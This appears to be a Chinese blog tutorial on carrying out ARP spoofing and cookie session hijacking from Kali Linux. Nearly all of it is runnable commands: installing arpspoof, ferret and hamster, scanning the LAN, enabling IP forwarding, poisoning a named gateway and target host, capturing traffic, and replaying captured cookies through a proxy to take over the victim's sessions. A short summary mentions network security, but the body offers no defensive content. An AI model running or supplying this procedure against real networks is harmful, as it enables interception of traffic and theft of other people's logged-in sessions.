kali linux(ARP欺骗+cookie会话劫持)

本文介绍了如何进行ARP欺骗和Cookie会话劫持的步骤,包括环境搭建、ARP欺骗工具的使用、流量转发、包捕获、会话重放等环节。通过Wireshark抓包和Freeter、Hamster工具,展示了攻击者如何干扰网络通信,窃取用户会话信息,强调了网络安全的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.环境搭建

1.下载arpspoof

 apt install dsniff

2.下载ferret

dpkg --add-architecture i386
apt-get clean
apt-get update
sudo apt install ferret-sidejack:i386

3.下载hamster

 wget http://http.kali.org/pool/main/h/hamster-sidejack/hamster-sidejack_2.0-1kali4_amd64.deb
 dpkg -i hamster-sidejack_2.0-1kali4_amd64.deb 

二.开始ARP欺骗

1.查找目标机

ifconfig #查看自己的网卡,IP和网关
nmap -sP 网关/24 #查看局域网内的所有IP并记住一个目标机的IP

这里我的网关为192.168.0.1,目标IP为192.168.0.66,之后不再提起

2.开启流量转发

cat /proc/sys/net/ipv4/ip_forward # 查看流量转发是否打开,0是未打开,1是打开
# 如果流量转发未打开,则输入下面的命令打开
echo 1 > /proc/sys/net/ipv4/ip_forward

3.开始ARP欺骗

arpspoof -i 网卡 -t 网关 目标机IP
# 我的命令为arpspoof -i eth0 -t 192.168.0.1 192.168.0.66

4.开始抓包

我这里使用wireshark抓包。
注意 保存时选择pacp文件格式,保存不要在root目录,否则ferret工具无法写入。

5.freeter工具重写

切换到pacp文件目录

freeter -r pacp文件 -w hamster.txt

==将生成的hamster.txt移动到root文件夹下

mv hamster.txt /root

6.hamster重放

启动hamster工具

hamster

在这里插入图片描述

7.开启浏览器代理

在这里插入图片描述
在这里插入图片描述
然后登录网页http://127.0.0.1:1234或者http://hamster即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

喂猪吃鸡腿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值